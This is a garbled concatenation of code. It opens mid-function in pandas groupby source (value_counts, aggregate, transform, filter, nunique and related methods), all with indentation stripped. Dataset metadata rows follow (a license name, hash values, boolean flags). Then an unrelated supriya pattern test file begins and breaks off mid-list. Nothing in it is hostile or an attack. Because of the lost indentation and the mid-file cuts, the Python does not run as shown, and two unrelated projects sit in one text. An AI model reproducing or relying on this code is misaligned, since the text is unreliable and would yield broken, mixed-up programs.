res = out[1:]
idx = idx[np.flatnonzero(idx)]
else:
res = out
else:
res = out[1:]
ri = self.grouper.result_index
# we might have duplications among the bins
if len(res) != len(ri):
res, out = np.zeros(len(ri), dtype=out.dtype), res
res[ids[idx]] = out
result = self.obj._constructor(res, index=ri, name=self.obj.name)
return self._reindex_output(result, fill_value=0)
@doc(Series.describe)
def describe(self, **kwargs):
result = self.apply(lambda x: x.describe(**kwargs))
if self.axis == 1:
return result.T
return result.unstack()
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
bins=None,
dropna: bool = True,
):
from pandas.core.reshape.merge import get_join_indexers
from pandas.core.reshape.tile import cut
ids, _, _ = self.grouper.group_info
val = self.obj._values
def apply_series_value_counts():
return self.apply(
Series.value_counts,
normalize=normalize,
sort=sort,
ascending=ascending,
bins=bins,
)
if bins is not None:
if not np.iterable(bins):
# scalar bins cannot be done at top level
# in a backward compatible way
return apply_series_value_counts()
elif is_categorical_dtype(val.dtype):
# GH38672
return apply_series_value_counts()
# groupby removes null keys from groupings
mask = ids != -1
ids, val = ids[mask], val[mask]
if bins is None:
lab, lev = algorithms.factorize(val, sort=True)
llab = lambda lab, inc: lab[inc]
else:
# lab is a Categorical with categories an IntervalIndex
lab = cut(Series(val), bins, include_lowest=True)
# error: "ndarray" has no attribute "cat"
lev = lab.cat.categories # type: ignore[attr-defined]
# error: No overload variant of "take" of "_ArrayOrScalarCommon" matches
# argument types "Any", "bool", "Union[Any, float]"
lab = lev.take( # type: ignore[call-overload]
# error: "ndarray" has no attribute "cat"
lab.cat.codes, # type: ignore[attr-defined]
allow_fill=True,
# error: Item "ndarray" of "Union[ndarray, Index]" has no attribute
# "_na_value"
fill_value=lev._na_value, # type: ignore[union-attr]
)
llab = lambda lab, inc: lab[inc]._multiindex.codes[-1]
if is_interval_dtype(lab.dtype):
# TODO: should we do this inside II?
# error: "ndarray" has no attribute "left"
# error: "ndarray" has no attribute "right"
sorter = np.lexsort(
(lab.left, lab.right, ids) # type: ignore[attr-defined]
)
else:
sorter = np.lexsort((lab, ids))
ids, lab = ids[sorter], lab[sorter]
# group boundaries are where group ids change
idchanges = 1 + np.nonzero(ids[1:] != ids[:-1])[0]
idx = np.r_[0, idchanges]
if not len(ids):
idx = idchanges
# new values are where sorted labels change
lchanges = llab(lab, slice(1, None)) != llab(lab, slice(None, -1))
inc = np.r_[True, lchanges]
if not len(lchanges):
inc = lchanges
inc[idx] = True # group boundaries are also new values
out = np.diff(np.nonzero(np.r_[inc, True])[0]) # value counts
# num. of times each group should be repeated
rep = partial(np.repeat, repeats=np.add.reduceat(inc, idx))
# multi-index components
codes = self.grouper.reconstructed_codes
codes = [rep(level_codes) for level_codes in codes] + [llab(lab, inc)]
levels = [ping.group_index for ping in self.grouper.groupings] + [lev]
names = self.grouper.names + [self.obj.name]
if dropna:
mask = codes[-1] != -1
if mask.all():
dropna = False
else:
out, codes = out[mask], [level_codes[mask] for level_codes in codes]
if normalize:
out = out.astype("float")
d = np.diff(np.r_[idx, len(ids)])
if dropna:
m = ids[lab == -1]
np.add.at(d, m, -1)
acc = rep(d)[mask]
else:
acc = rep(d)
out /= acc
if sort and bins is None:
cat = ids[inc][mask] if dropna else ids[inc]
sorter = np.lexsort((out if ascending else -out, cat))
out, codes[-1] = out[sorter], codes[-1][sorter]
if bins is not None:
# for compat. with libgroupby.value_counts need to ensure every
# bin is present at every index level, null filled with zeros
diff = np.zeros(len(out), dtype="bool")
for level_codes in codes[:-1]:
diff |= np.r_[True, level_codes[1:] != level_codes[:-1]]
ncat, nbin = diff.sum(), len(levels[-1])
left = [np.repeat(np.arange(ncat), nbin), np.tile(np.arange(nbin), ncat)]
right = [diff.cumsum() - 1, codes[-1]]
_, idx = get_join_indexers(left, right, sort=False, how="left")
out = np.where(idx != -1, out[idx], 0)
if sort:
sorter = np.lexsort((out if ascending else -out, left[0]))
out, left[-1] = out[sorter], left[-1][sorter]
# build the multi-index w/ full levels
def build_codes(lev_codes: np.ndarray) -> np.ndarray:
return np.repeat(lev_codes[diff], nbin)
codes = [build_codes(lev_codes) for lev_codes in codes[:-1]]
codes.append(left[-1])
mi = MultiIndex(levels=levels, codes=codes, names=names, verify_integrity=False)
if is_integer_dtype(out.dtype):
out = ensure_int64(out)
return self.obj._constructor(out, index=mi, name=self.obj.name)
def count(self) -> Series:
"""
Compute count of group, excluding missing values.
Returns
-------
Series
Count of values within each group.
"""
ids, _, ngroups = self.grouper.group_info
val = self.obj._values
mask = (ids != -1) & ~isna(val)
minlength = ngroups or 0
out = np.bincount(ids[mask], minlength=minlength)
result = self.obj._constructor(
out,
index=self.grouper.result_index,
name=self.obj.name,
dtype="int64",
)
return self._reindex_output(result, fill_value=0)
def pct_change(self, periods=1, fill_method="pad", limit=None, freq=None):
"""Calculate pct_change of each value to previous entry in group"""
# TODO: Remove this conditional when #23918 is fixed
if freq:
return self.apply(
lambda x: x.pct_change(
periods=periods, fill_method=fill_method, limit=limit, freq=freq
)
)
if fill_method is None: # GH30463
fill_method = "pad"
limit = 0
filled = getattr(self, fill_method)(limit=limit)
fill_grp = filled.groupby(self.grouper.codes)
shifted = fill_grp.shift(periods=periods, freq=freq)
return (filled / shifted) - 1
@pin_allowlisted_properties(DataFrame, base.dataframe_apply_allowlist)
class DataFrameGroupBy(GroupBy[DataFrame]):
_apply_allowlist = base.dataframe_apply_allowlist
_agg_examples_doc = dedent(
"""
Examples
--------
>>> df = pd.DataFrame(
... {
... "A": [1, 1, 2, 2],
... "B": [1, 2, 3, 4],
... "C": [0.362838, 0.227877, 1.267767, -0.562860],
... }
... )
>>> df
A B C
0 1 1 0.362838
1 1 2 0.227877
2 2 3 1.267767
3 2 4 -0.562860
The aggregation is for each column.
>>> df.groupby('A').agg('min')
B C
A
1 1 0.227877
2 3 -0.562860
Multiple aggregations
>>> df.groupby('A').agg(['min', 'max'])
B C
min max min max
A
1 1 2 0.227877 0.362838
2 3 4 -0.562860 1.267767
Select a column for aggregation
>>> df.groupby('A').B.agg(['min', 'max'])
min max
A
1 1 2
2 3 4
Different aggregations per column
>>> df.groupby('A').agg({'B': ['min', 'max'], 'C': 'sum'})
B C
min max sum
A
1 1 2 0.590715
2 3 4 0.704907
To control the output names with different aggregations per column,
pandas supports "named aggregation"
>>> df.groupby("A").agg(
... b_min=pd.NamedAgg(column="B", aggfunc="min"),
... c_sum=pd.NamedAgg(column="C", aggfunc="sum"))
b_min c_sum
A
1 1 0.590715
2 3 0.704907
- The keywords are the *output* column names
- The values are tuples whose first element is the column to select
and the second element is the aggregation to apply to that column.
Pandas provides the ``pandas.NamedAgg`` namedtuple with the fields
``['column', 'aggfunc']`` to make it clearer what the arguments are.
As usual, the aggregation can be a callable or a string alias.
See :ref:`groupby.aggregate.named` for more.
.. versionchanged:: 1.3.0
The resulting dtype will reflect the return value of the aggregating function.
>>> df.groupby("A")[["B"]].agg(lambda x: x.astype(float).min())
B
A
1 1.0
2 3.0"""
)
@doc(_agg_template, examples=_agg_examples_doc, klass="DataFrame")
def aggregate(self, func=None, *args, engine=None, engine_kwargs=None, **kwargs):
if maybe_use_numba(engine):
with group_selection_context(self):
data = self._selected_obj
result, index = self._aggregate_with_numba(
data, func, *args, engine_kwargs=engine_kwargs, **kwargs
)
return self.obj._constructor(result, index=index, columns=data.columns)
relabeling, func, columns, order = reconstruct_func(func, **kwargs)
func = maybe_mangle_lambdas(func)
op = GroupByApply(self, func, args, kwargs)
result = op.agg()
if not is_dict_like(func) and result is not None:
return result
elif relabeling and result is not None:
# this should be the only (non-raising) case with relabeling
# used reordered index of columns
result = result.iloc[:, order]
result.columns = columns
if result is None:
# grouper specific aggregations
if self.grouper.nkeys > 1:
# test_groupby_as_index_series_scalar gets here with 'not self.as_index'
return self._python_agg_general(func, *args, **kwargs)
elif args or kwargs:
# test_pass_args_kwargs gets here (with and without as_index)
# can't return early
result = self._aggregate_frame(func, *args, **kwargs)
elif self.axis == 1:
# _aggregate_multiple_funcs does not allow self.axis == 1
# Note: axis == 1 precludes 'not self.as_index', see __init__
result = self._aggregate_frame(func)
return result
else:
# try to treat as if we are passing a list
gba = GroupByApply(self, [func], args=(), kwargs={})
try:
result = gba.agg()
except ValueError as err:
if "no results" not in str(err):
# raised directly by _aggregate_multiple_funcs
raise
result = self._aggregate_frame(func)
else:
sobj = self._selected_obj
if isinstance(sobj, Series):
# GH#35246 test_groupby_as_index_select_column_sum_empty_df
result.columns = [sobj.name]
else:
# select everything except for the last level, which is the one
# containing the name of the function(s), see GH#32040
result.columns = result.columns.rename(
[sobj.columns.name] * result.columns.nlevels
).droplevel(-1)
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
result.index = Index(range(len(result)))
return result._convert(datetime=True)
agg = aggregate
def _iterate_slices(self) -> Iterable[Series]:
obj = self._selected_obj
if self.axis == 1:
obj = obj.T
if isinstance(obj, Series) and obj.name not in self.exclusions:
# Occurs when doing DataFrameGroupBy(...)["X"]
yield obj
else:
for label, values in obj.items():
if label in self.exclusions:
continue
yield values
def _cython_agg_general(
self, how: str, alt: Callable, numeric_only: bool, min_count: int = -1
) -> DataFrame:
# Note: we never get here with how="ohlc"; that goes through SeriesGroupBy
data: Manager2D = self._get_data_to_aggregate()
orig = data
if numeric_only:
data = data.get_numeric_data(copy=False)
def array_func(values: ArrayLike) -> ArrayLike:
try:
result = self.grouper._cython_operation(
"aggregate", values, how, axis=data.ndim - 1, min_count=min_count
)
except NotImplementedError:
# generally if we have numeric_only=False
# and non-applicable functions
# try to python agg
# TODO: shouldn't min_count matter?
result = self._agg_py_fallback(values, ndim=data.ndim, alt=alt)
return result
# TypeError -> we may have an exception in trying to aggregate
# continue and exclude the block
new_mgr = data.grouped_reduce(array_func, ignore_failures=True)
if not len(new_mgr) and len(orig):
# If the original Manager was already empty, no need to raise
raise DataError("No numeric types to aggregate")
if len(new_mgr) < len(data):
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.{how} "
"is deprecated. In a future version, a TypeError will be raised. "
f"Before calling .{how}, select only columns which should be "
"valid for the function.",
FutureWarning,
stacklevel=4,
)
return self._wrap_agged_manager(new_mgr)
def _aggregate_frame(self, func, *args, **kwargs) -> DataFrame:
if self.grouper.nkeys != 1:
raise AssertionError("Number of keys must be 1")
obj = self._obj_with_exclusions
result: dict[Hashable, NDFrame | np.ndarray] = {}
if self.axis == 0:
# test_pass_args_kwargs_duplicate_columns gets here with non-unique columns
for name, data in self:
fres = func(data, *args, **kwargs)
result[name] = fres
else:
# we get here in a number of test_multilevel tests
for name in self.indices:
grp_df = self.get_group(name, obj=obj)
fres = func(grp_df, *args, **kwargs)
result[name] = fres
result_index = self.grouper.result_index
other_ax = obj.axes[1 - self.axis]
out = self.obj._constructor(result, index=other_ax, columns=result_index)
if self.axis == 0:
out = out.T
return out
def _aggregate_item_by_item(self, func, *args, **kwargs) -> DataFrame:
# only for axis==0
# tests that get here with non-unique cols:
# test_resample_with_timedelta_yields_no_empty_groups,
# test_resample_apply_product
obj = self._obj_with_exclusions
result: dict[int | str, NDFrame] = {}
for i, item in enumerate(obj):
ser = obj.iloc[:, i]
colg = SeriesGroupBy(
ser, selection=item, grouper=self.grouper, exclusions=self.exclusions
)
result[i] = colg.aggregate(func, *args, **kwargs)
res_df = self.obj._constructor(result)
res_df.columns = obj.columns
return res_df
def _wrap_applied_output(self, data, keys, values, not_indexed_same=False):
if len(keys) == 0:
result = self.obj._constructor(
index=self.grouper.result_index, columns=data.columns
)
result = result.astype(data.dtypes.to_dict(), copy=False)
return result
# GH12824
first_not_none = next(com.not_none(*values), None)
if first_not_none is None:
# GH9684 - All values are None, return an empty frame.
return self.obj._constructor()
elif isinstance(first_not_none, DataFrame):
return self._concat_objects(keys, values, not_indexed_same=not_indexed_same)
key_index = self.grouper.result_index if self.as_index else None
if isinstance(first_not_none, (np.ndarray, Index)):
# GH#1738: values is list of arrays of unequal lengths
# fall through to the outer else clause
# TODO: sure this is right? we used to do this
# after raising AttributeError above
return self.obj._constructor_sliced(
values, index=key_index, name=self._selection
)
elif not isinstance(first_not_none, Series):
# values are not series or array-like but scalars
# self._selection not passed through to Series as the
# result should not take the name of original selection
# of columns
if self.as_index:
return self.obj._constructor_sliced(values, index=key_index)
else:
result = self.obj._constructor(
values, index=key_index, columns=[self._selection]
)
self._insert_inaxis_grouper_inplace(result)
return result
else:
# values are Series
return self._wrap_applied_output_series(
keys, values, not_indexed_same, first_not_none, key_index
)
def _wrap_applied_output_series(
self,
keys,
values: list[Series],
not_indexed_same: bool,
first_not_none,
key_index,
) -> FrameOrSeriesUnion:
# this is to silence a DeprecationWarning
# TODO: Remove when default dtype of empty Series is object
kwargs = first_not_none._construct_axes_dict()
backup = create_series_with_explicit_dtype(dtype_if_empty=object, **kwargs)
values = [x if (x is not None) else backup for x in values]
all_indexed_same = all_indexes_same(x.index for x in values)
# GH3596
# provide a reduction (Frame -> Series) if groups are
# unique
if self.squeeze:
applied_index = self._selected_obj._get_axis(self.axis)
singular_series = len(values) == 1 and applied_index.nlevels == 1
# assign the name to this series
if singular_series:
values[0].name = keys[0]
# GH2893
# we have series in the values array, we want to
# produce a series:
# if any of the sub-series are not indexed the same
# OR we don't have a multi-index and we have only a
# single values
return self._concat_objects(
keys, values, not_indexed_same=not_indexed_same
)
# still a series
# path added as of GH 5545
elif all_indexed_same:
from pandas.core.reshape.concat import concat
return concat(values)
if not all_indexed_same:
# GH 8467
return self._concat_objects(keys, values, not_indexed_same=True)
# Combine values
# vstack+constructor is faster than concat and handles MI-columns
stacked_values = np.vstack([np.asarray(v) for v in values])
if self.axis == 0:
index = key_index
columns = first_not_none.index.copy()
if columns.name is None:
# GH6124 - propagate name of Series when it's consistent
names = {v.name for v in values}
if len(names) == 1:
columns.name = list(names)[0]
else:
index = first_not_none.index
columns = key_index
stacked_values = stacked_values.T
if stacked_values.dtype == object:
# We'll have the DataFrame constructor do inference
stacked_values = stacked_values.tolist()
result = self.obj._constructor(stacked_values, index=index, columns=columns)
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
return self._reindex_output(result)
def _cython_transform(
self, how: str, numeric_only: bool = True, axis: int = 0, **kwargs
) -> DataFrame:
assert axis == 0 # handled by caller
# TODO: no tests with self.ndim == 1 for DataFrameGroupBy
# With self.axis == 0, we have multi-block tests
# e.g. test_rank_min_int, test_cython_transform_frame
# test_transform_numeric_ret
# With self.axis == 1, _get_data_to_aggregate does a transpose
# so we always have a single block.
mgr: Manager2D = self._get_data_to_aggregate()
if numeric_only:
mgr = mgr.get_numeric_data(copy=False)
def arr_func(bvalues: ArrayLike) -> ArrayLike:
return self.grouper._cython_operation(
"transform", bvalues, how, 1, **kwargs
)
# We could use `mgr.apply` here and not have to set_axis, but
# we would have to do shape gymnastics for ArrayManager compat
res_mgr = mgr.grouped_reduce(arr_func, ignore_failures=True)
res_mgr.set_axis(1, mgr.axes[1])
if len(res_mgr) < len(mgr):
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.{how} "
"is deprecated. In a future version, a TypeError will be raised. "
f"Before calling .{how}, select only columns which should be "
"valid for the transforming function.",
FutureWarning,
stacklevel=4,
)
res_df = self.obj._constructor(res_mgr)
if self.axis == 1:
res_df = res_df.T
return res_df
def _transform_general(self, func, *args, **kwargs):
from pandas.core.reshape.concat import concat
applied = []
obj = self._obj_with_exclusions
gen = self.grouper.get_iterator(obj, axis=self.axis)
fast_path, slow_path = self._define_paths(func, *args, **kwargs)
for name, group in gen:
object.__setattr__(group, "name", name)
# Try slow path and fast path.
try:
path, res = self._choose_path(fast_path, slow_path, group)
except TypeError:
return self._transform_item_by_item(obj, fast_path)
except ValueError as err:
msg = "transform must return a scalar value for each group"
raise ValueError(msg) from err
if isinstance(res, Series):
# we need to broadcast across the
# other dimension; this will preserve dtypes
# GH14457
if not np.prod(group.shape):
continue
elif res.index.is_(obj.index):
r = concat([res] * len(group.columns), axis=1)
r.columns = group.columns
r.index = group.index
else:
r = self.obj._constructor(
np.concatenate([res.values] * len(group.index)).reshape(
group.shape
),
columns=group.columns,
index=group.index,
)
applied.append(r)
else:
applied.append(res)
concat_index = obj.columns if self.axis == 0 else obj.index
other_axis = 1 if self.axis == 0 else 0 # switches between 0 & 1
concatenated = concat(applied, axis=self.axis, verify_integrity=False)
concatenated = concatenated.reindex(concat_index, axis=other_axis, copy=False)
return self._set_result_index_ordered(concatenated)
@Substitution(klass="DataFrame")
@Appender(_transform_template)
def transform(self, func, *args, engine=None, engine_kwargs=None, **kwargs):
return self._transform(
func, *args, engine=engine, engine_kwargs=engine_kwargs, **kwargs
)
def _can_use_transform_fast(self, result) -> bool:
return isinstance(result, DataFrame) and result.columns.equals(
self._obj_with_exclusions.columns
)
def _wrap_transform_fast_result(self, result: DataFrame) -> DataFrame:
"""
Fast transform path for aggregations
"""
obj = self._obj_with_exclusions
# for each col, reshape to size of original frame by take operation
ids, _, _ = self.grouper.group_info
result = result.reindex(self.grouper.result_index, copy=False)
output = result.take(ids, axis=0)
output.index = obj.index
return output
def _define_paths(self, func, *args, **kwargs):
if isinstance(func, str):
fast_path = lambda group: getattr(group, func)(*args, **kwargs)
slow_path = lambda group: group.apply(
lambda x: getattr(x, func)(*args, **kwargs), axis=self.axis
)
else:
fast_path = lambda group: func(group, *args, **kwargs)
slow_path = lambda group: group.apply(
lambda x: func(x, *args, **kwargs), axis=self.axis
)
return fast_path, slow_path
def _choose_path(self, fast_path: Callable, slow_path: Callable, group: DataFrame):
path = slow_path
res = slow_path(group)
# if we make it here, test if we can use the fast path
try:
res_fast = fast_path(group)
except AssertionError:
raise # pragma: no cover
except Exception:
# GH#29631 For user-defined function, we can't predict what may be
# raised; see test_transform.test_transform_fastpath_raises
return path, res
# verify fast path does not change columns (and names), otherwise
# its results cannot be joined with those of the slow path
if not isinstance(res_fast, DataFrame):
return path, res
if not res_fast.columns.equals(group.columns):
return path, res
if res_fast.equals(res):
path = fast_path
return path, res
def _transform_item_by_item(self, obj: DataFrame, wrapper) -> DataFrame:
# iterate through columns, see test_transform_exclude_nuisance
# gets here with non-unique columns
output = {}
inds = []
for i, col in enumerate(obj):
subset = obj.iloc[:, i]
sgb = SeriesGroupBy(
subset,
selection=col,
grouper=self.grouper,
exclusions=self.exclusions,
)
try:
output[i] = sgb.transform(wrapper)
except TypeError:
# e.g. trying to call nanmean with string values
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.transform "
"is deprecated. In a future version, a TypeError will be raised. "
"Before calling .transform, select only columns which should be "
"valid for the transforming function.",
FutureWarning,
stacklevel=5,
)
else:
inds.append(i)
if not output:
raise TypeError("Transform function invalid for data types")
columns = obj.columns.take(inds)
result = self.obj._constructor(output, index=obj.index)
result.columns = columns
return result
def filter(self, func, dropna=True, *args, **kwargs):
"""
Return a copy of a DataFrame excluding filtered elements.
Elements from groups are filtered if they do not satisfy the
boolean criterion specified by func.
Parameters
----------
func : function
Function to apply to each subframe. Should return True or False.
dropna : Drop groups that do not pass the filter. True by default;
If False, groups that evaluate False are filled with NaNs.
Returns
-------
filtered : DataFrame
Notes
-----
Each subframe is endowed the attribute 'name' in case you need to know
which group you are working on.
Functions that mutate the passed object can produce unexpected
behavior or errors and are not supported. See :ref:`gotchas.udf-mutation`
for more details.
Examples
--------
>>> df = pd.DataFrame({'A' : ['foo', 'bar', 'foo', 'bar',
... 'foo', 'bar'],
... 'B' : [1, 2, 3, 4, 5, 6],
... 'C' : [2.0, 5., 8., 1., 2., 9.]})
>>> grouped = df.groupby('A')
>>> grouped.filter(lambda x: x['B'].mean() > 3.)
A B C
1 bar 2 5.0
3 bar 4 1.0
5 bar 6 9.0
"""
indices = []
obj = self._selected_obj
gen = self.grouper.get_iterator(obj, axis=self.axis)
for name, group in gen:
object.__setattr__(group, "name", name)
res = func(group, *args, **kwargs)
try:
res = res.squeeze()
except AttributeError: # allow e.g., scalars and frames to pass
pass
# interpret the result of the filter
if is_bool(res) or (is_scalar(res) and isna(res)):
if res and notna(res):
indices.append(self._get_index(name))
else:
# non scalars aren't allowed
raise TypeError(
f"filter function returned a {type(res).__name__}, "
"but expected a scalar bool"
)
return self._apply_filter(indices, dropna)
def __getitem__(self, key) -> DataFrameGroupBy | SeriesGroupBy:
if self.axis == 1:
# GH 37725
raise ValueError("Cannot subset columns when using axis=1")
# per GH 23566
if isinstance(key, tuple) and len(key) > 1:
# if len == 1, then it becomes a SeriesGroupBy and this is actually
# valid syntax, so don't raise warning
warnings.warn(
"Indexing with multiple keys (implicitly converted to a tuple "
"of keys) will be deprecated, use a list instead.",
FutureWarning,
stacklevel=2,
)
return super().__getitem__(key)
def _gotitem(self, key, ndim: int, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
"""
if ndim == 2:
if subset is None:
subset = self.obj
return DataFrameGroupBy(
subset,
self.grouper,
axis=self.axis,
level=self.level,
grouper=self.grouper,
exclusions=self.exclusions,
selection=key,
as_index=self.as_index,
sort=self.sort,
group_keys=self.group_keys,
squeeze=self.squeeze,
observed=self.observed,
mutated=self.mutated,
dropna=self.dropna,
)
elif ndim == 1:
if subset is None:
subset = self.obj[key]
return SeriesGroupBy(
subset,
level=self.level,
grouper=self.grouper,
selection=key,
sort=self.sort,
group_keys=self.group_keys,
squeeze=self.squeeze,
observed=self.observed,
dropna=self.dropna,
)
raise AssertionError("invalid ndim for _gotitem")
def _get_data_to_aggregate(self) -> Manager2D:
obj = self._obj_with_exclusions
if self.axis == 1:
return obj.T._mgr
else:
return obj._mgr
def _insert_inaxis_grouper_inplace(self, result: DataFrame) -> None:
# zip in reverse so we can always insert at loc 0
columns = result.columns
for name, lev, in_axis in zip(
reversed(self.grouper.names),
reversed(self.grouper.get_group_levels()),
reversed([grp.in_axis for grp in self.grouper.groupings]),
):
# GH #28549
# When using .apply(-), name will be in columns already
if in_axis and name not in columns:
result.insert(0, name, lev)
def _wrap_aggregated_output(
self,
output: Mapping[base.OutputKey, Series | ArrayLike],
) -> DataFrame:
"""
Wraps the output of DataFrameGroupBy aggregations into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, np.ndarray]]
Data to wrap.
Returns
-------
DataFrame
"""
indexed_output = {key.position: val for key, val in output.items()}
columns = Index([key.label for key in output])
columns._set_names(self._obj_with_exclusions._get_axis(1 - self.axis).names)
result = self.obj._constructor(indexed_output)
result.columns = columns
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
result = result._consolidate()
else:
result.index = self.grouper.result_index
if self.axis == 1:
result = result.T
if result.index.equals(self.obj.index):
# Retain e.g. DatetimeIndex/TimedeltaIndex freq
result.index = self.obj.index.copy()
# TODO: Do this more systematically
return self._reindex_output(result)
def _wrap_transformed_output(
self, output: Mapping[base.OutputKey, Series | ArrayLike]
) -> DataFrame:
"""
Wraps the output of DataFrameGroupBy transformations into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, np.ndarray, ExtensionArray]]
Data to wrap.
Returns
-------
DataFrame
"""
indexed_output = {key.position: val for key, val in output.items()}
result = self.obj._constructor(indexed_output)
if self.axis == 1:
result = result.T
result.columns = self.obj.columns
else:
columns = Index(key.label for key in output)
columns.name = self.obj.columns.name
result.columns = columns
result.index = self.obj.index
return result
def _wrap_agged_manager(self, mgr: Manager2D) -> DataFrame:
if not self.as_index:
index = Index(range(mgr.shape[1]))
mgr.set_axis(1, index)
result = self.obj._constructor(mgr)
self._insert_inaxis_grouper_inplace(result)
result = result._consolidate()
else:
index = self.grouper.result_index
mgr.set_axis(1, index)
result = self.obj._constructor(mgr)
if self.axis == 1:
result = result.T
return self._reindex_output(result)._convert(datetime=True)
def _iterate_column_groupbys(self, obj: FrameOrSeries):
for i, colname in enumerate(obj.columns):
yield colname, SeriesGroupBy(
obj.iloc[:, i],
selection=colname,
grouper=self.grouper,
exclusions=self.exclusions,
)
def _apply_to_column_groupbys(self, func, obj: FrameOrSeries) -> DataFrame:
from pandas.core.reshape.concat import concat
columns = obj.columns
results = [
func(col_groupby) for _, col_groupby in self._iterate_column_groupbys(obj)
]
if not len(results):
# concat would raise
return DataFrame([], columns=columns, index=self.grouper.result_index)
else:
return concat(results, keys=columns, axis=1)
def count(self) -> DataFrame:
"""
Compute count of group, excluding missing values.
Returns
-------
DataFrame
Count of values within each group.
"""
data = self._get_data_to_aggregate()
ids, _, ngroups = self.grouper.group_info
mask = ids != -1
def hfunc(bvalues: ArrayLike) -> ArrayLike:
# TODO(2DEA): reshape would not be necessary with 2D EAs
if bvalues.ndim == 1:
# EA
masked = mask & ~isna(bvalues).reshape(1, -1)
else:
masked = mask & ~isna(bvalues)
counted = lib.count_level_2d(masked, labels=ids, max_bin=ngroups, axis=1)
return counted
new_mgr = data.grouped_reduce(hfunc)
# If we are grouping on categoricals we want unobserved categories to
# return zero, rather than the default of NaN which the reindexing in
# _wrap_agged_manager() returns. GH 35028
with com.temp_setattr(self, "observed", True):
result = self._wrap_agged_manager(new_mgr)
return self._reindex_output(result, fill_value=0)
def nunique(self, dropna: bool = True) -> DataFrame:
"""
Return DataFrame with counts of unique elements in each position.
Parameters
----------
dropna : bool, default True
Don't include NaN in the counts.
Returns
-------
nunique: DataFrame
Examples
--------
>>> df = pd.DataFrame({'id': ['spam', 'egg', 'egg', 'spam',
... 'ham', 'ham'],
... 'value1': [1, 5, 5, 2, 5, 5],
... 'value2': list('abbaxy')})
>>> df
id value1 value2
0 spam 1 a
1 egg 5 b
2 egg 5 b
3 spam 2 a
4 ham 5 x
5 ham 5 y
>>> df.groupby('id').nunique()
value1 value2
id
egg 1 1
ham 1 2
spam 2 1
Check for rows with the same id but conflicting values:
>>> df.groupby('id').filter(lambda g: (g.nunique() > 1).any())
id value1 value2
0 spam 1 a
3 spam 2 a
4 ham 5 x
5 ham 5 y
"""
if self.axis != 0:
# see test_groupby_crash_on_nunique
return self._python_agg_general(lambda sgb: sgb.nunique(dropna))
obj = self._obj_with_exclusions
results = self._apply_to_column_groupbys(
lambda sgb: sgb.nunique(dropna), obj=obj
)
results.columns.names = obj.columns.names # TODO: do at higher level?
if not self.as_index:
results.index = Index(range(len(results)))
self._insert_inaxis_grouper_inplace(results)
return results
@Appender(DataFrame.idxmax.__doc__)
def idxmax(self, axis=0, skipna: bool = True):
axis = DataFrame._get_axis_number(axis)
numeric_only = None if axis == 0 else False
def func(df):
# NB: here we use numeric_only=None, in DataFrame it is False GH#38217
res = df._reduce(
nanops.nanargmax,
"argmax",
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
)
indices = res._values
index = df._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return df._constructor_sliced(result, index=res.index)
return self._python_apply_general(func, self._obj_with_exclusions)
@Appender(DataFrame.idxmin.__doc__)
def idxmin(self, axis=0, skipna: bool = True):
axis = DataFrame._get_axis_number(axis)
numeric_only = None if axis == 0 else False
def func(df):
# NB: here we use numeric_only=None, in DataFrame it is False GH#38217
res = df._reduce(
nanops.nanargmin,
"argmin",
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
)
indices = res._values
index = df._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return df._constructor_sliced(result, index=res.index)
return self._python_apply_general(func, self._obj_with_exclusions)
boxplot = boxplot_frame_groupby
|
bsd-3-clause
| -8,992,444,320,100,172,000
| 32.947425
| 88
| 0.548184
| false
| 4.146386
| false
| false
| false
|
Pulgama/supriya
|
tests/test_patterns_Pgpar_Pfx_Pgroup.py
|
1
|
11524
|
import pytest
import uqbar.strings
import supriya.assets.synthdefs
import supriya.nonrealtime
import supriya.patterns
import supriya.synthdefs
import supriya.ugens
with supriya.synthdefs.SynthDefBuilder(in_=0, out=0) as builder:
source = supriya.ugens.In.ar(bus=builder["in_"])
source = supriya.ugens.Limiter.ar(source=source)
supriya.ugens.Out.ar(bus=builder["out"], source=source)
limiter_synthdef = builder.build()
pattern_one = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([1111, 1112, 1113], 1)
),
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([2221, 2222, 2223], 1)
),
]
)
pattern_one = pattern_one.with_group()
pattern_one = pattern_one.with_effect(synthdef=limiter_synthdef)
pattern_two = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([3331, 3332, 3333], 1)
),
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([4441, 4442, 4443], 1)
),
]
)
pattern_two = pattern_two.with_group()
pattern_two = pattern_two.with_effect(synthdef=limiter_synthdef)
pattern = supriya.patterns.Pgpar([pattern_one, pattern_two])
pattern = pattern.with_bus()
def test_nonrealtime():
session = supriya.nonrealtime.Session()
with session.at(0):
final_offset = session.inscribe(pattern)
d_recv_commands = pytest.helpers.build_d_recv_commands(
[
supriya.assets.synthdefs.system_link_audio_2,
supriya.assets.synthdefs.default,
limiter_synthdef,
]
)
assert session.to_lists() == [
[
0.0,
[
*d_recv_commands,
["/g_new", 1000, 0, 0],
[
"/s_new",
"38a2c79fc9d58d06e361337163a4e80f",
1001,
3,
1000,
"fade_time",
0.25,
"in_",
16,
],
["/g_new", 1002, 1, 1000],
["/g_new", 1003, 1, 1000],
[
"/s_new",
"38bda0aee6d0e2d4af72be83c09d9b77",
1004,
1,
1002,
"in_",
16,
"out",
16,
],
["/g_new", 1005, 0, 1002],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1006,
0,
1005,
"frequency",
1111,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1007,
0,
1005,
"frequency",
